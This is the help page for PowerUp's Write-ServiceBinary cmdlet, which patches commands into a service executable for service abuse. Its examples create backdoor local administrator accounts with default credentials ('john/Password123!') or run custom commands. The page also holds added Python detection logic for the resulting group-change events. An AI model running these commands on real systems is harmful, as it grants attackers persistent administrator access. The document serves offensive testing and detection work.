# Write-ServiceBinary
## SYNOPSIS
Patches the specified command into a pre-compiled C# service executable and
writes the binary out to the location given by -Path.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
## SYNTAX
```
Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>]
[-Credential <PSCredential>] [-Command <String>] [-Path <String>]
```
## DESCRIPTION
Takes a pre-compiled C# service binary and patches in the appropriate commands needed
for service abuse.
If a -UserName/-Password or -Credential is specified, the command
patched in creates a local user and adds them to the specified -LocalGroup, otherwise
the specified -Command is patched in.
The binary is then written out to the location specified by -Path.
Either -Name must be specified for the service, or a proper object from
Get-Service must be passed on the pipeline in order to patch in the appropriate service
name the binary will be running under.
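Added example (not part of PowerSploit or the original page): detection logic for the footprint the description implies, a local group membership change performed by the service account rather than by an administrator. It assumes Security events 4720 and 4732 have been exported as dictionaries keyed by their standard field names; the function name, SIDs and sample events are constructed for illustration.

```python
from datetime import datetime, timedelta

SYSTEM_SID = "S-1-5-18"                 # LocalSystem: the account most services run as
SENSITIVE_GROUPS = {"S-1-5-32-544"}     # BUILTIN\Administrators (the page's default -LocalGroup)

def find_system_group_adds(events, window=timedelta(seconds=60)):
    """Flag 4732 (member added to local group) events performed by SYSTEM on a
    sensitive group, noting whether SYSTEM also created the member (4720) just before."""
    created = {}                        # new account SID -> (creation time, account name)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["SubjectUserSid"] != SYSTEM_SID:
            continue                    # interactive admin activity is out of scope here
        if ev["id"] == 4720:            # 4720: TargetSid/TargetUserName describe the new account
            created[ev["TargetSid"]] = (ev["time"], ev["TargetUserName"])
        elif ev["id"] == 4732 and ev["TargetSid"] in SENSITIVE_GROUPS:
            made = created.get(ev["MemberSid"])   # 4732: TargetSid is the group
            fresh = made is not None and ev["time"] - made[0] <= window
            alerts.append({
                "time": ev["time"],
                "member_sid": ev["MemberSid"],
                "account": made[1] if fresh else None,
                "pattern": "create+add" if fresh else "add-only",
            })
    return alerts

# Constructed sample events (not real log data); all SIDs are made up.
T0 = datetime(2024, 1, 1, 12, 0, 0)
LOCAL = "S-1-5-21-1111111111-1111111111-1111111111"
DOMAIN = "S-1-5-21-2222222222-2222222222-2222222222"
SAMPLE_EVENTS = [
    {"id": 4720, "time": T0, "SubjectUserSid": SYSTEM_SID,
     "TargetSid": LOCAL + "-1005", "TargetUserName": "john"},
    {"id": 4732, "time": T0 + timedelta(seconds=1), "SubjectUserSid": SYSTEM_SID,
     "TargetSid": "S-1-5-32-545", "MemberSid": LOCAL + "-1005"},   # Users group: ignored
    {"id": 4732, "time": T0 + timedelta(seconds=1), "SubjectUserSid": SYSTEM_SID,
     "TargetSid": "S-1-5-32-544", "MemberSid": LOCAL + "-1005"},
    {"id": 4732, "time": T0 + timedelta(minutes=5), "SubjectUserSid": LOCAL + "-500",
     "TargetSid": "S-1-5-32-544", "MemberSid": LOCAL + "-1006"},   # admin-driven: ignored
    {"id": 4732, "time": T0 + timedelta(minutes=9), "SubjectUserSid": SYSTEM_SID,
     "TargetSid": "S-1-5-32-544", "MemberSid": DOMAIN + "-1104"},  # existing domain user
]

if __name__ == "__main__":
    for alert in find_system_group_adds(SAMPLE_EVENTS):
        print(alert)
```

The "add-only" pattern corresponds to the domain-user case, where the account already exists and is only added to the group. Group Policy and management agents also change group membership as SYSTEM, so baseline those sources before alerting.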
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Write-ServiceBinary -Name VulnSVC
```
Writes a service binary to service.exe in the local directory for VulnSVC that
adds a local Administrator (john/Password123!).
### -------------------------- EXAMPLE 2 --------------------------
```
Get-Service VulnSVC | Write-ServiceBinary
```
Writes a service binary to service.exe in the local directory for VulnSVC that
adds a local Administrator (john/Password123!).
### -------------------------- EXAMPLE 3 --------------------------
```
Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
```
Writes a service binary to service.exe in the local directory for VulnSVC that adds
TESTLAB\john to the Administrators local group.
### -------------------------- EXAMPLE 4 --------------------------
```
Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
```
Writes a service binary to service.exe in the local directory for VulnSVC that
adds a local Administrator (backdoor/Password123!).
### -------------------------- EXAMPLE 5 --------------------------
```
Write-ServiceBinary -Name VulnSVC -Command "net ..."
```
Writes a service binary to service.exe in the local directory for VulnSVC that
executes a custom command.
## PARAMETERS
### -Name
The service name the EXE will be running under.
```yaml
Type: String
Parameter Sets: (All)
Aliases: ServiceName
Required: True
Position: 1
Default value: None
Accept pipeline input: True (ByPropertyName, ByValue)
Accept wildcard characters: False
```
### -UserName
The \[domain\\\]username to add.
If not given, it defaults to "john".
Domain users are not created, only added to the specified local group.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: john
Accept pipeline input: False
Accept wildcard characters: False
```
### -Password
The password to set for the added user.
If not given, it defaults to "Password123!".
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: Password123!
Accept pipeline input: False
Accept wildcard characters: False
```
### -LocalGroup
Local group name to add the user to (default of 'Administrators').
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: Administrators
Accept pipeline input: False
Accept wildcard characters: False
```
### -Credential
A \[Management.Automation.PSCredential\] object specifying the user/password to add.
```yaml
Type: PSCredential
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: [Management.Automation.PSCredential]::Empty
Accept pipeline input: False
Accept wildcard characters: False
```
### -Command
Custom command to execute instead of user creation.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Path
Path to write the binary out to, defaults to 'service.exe' in the local directory.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: "$(Convert-Path .)\service.exe"
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
### PowerUp.ServiceBinary
## NOTES
## RELATED LINKS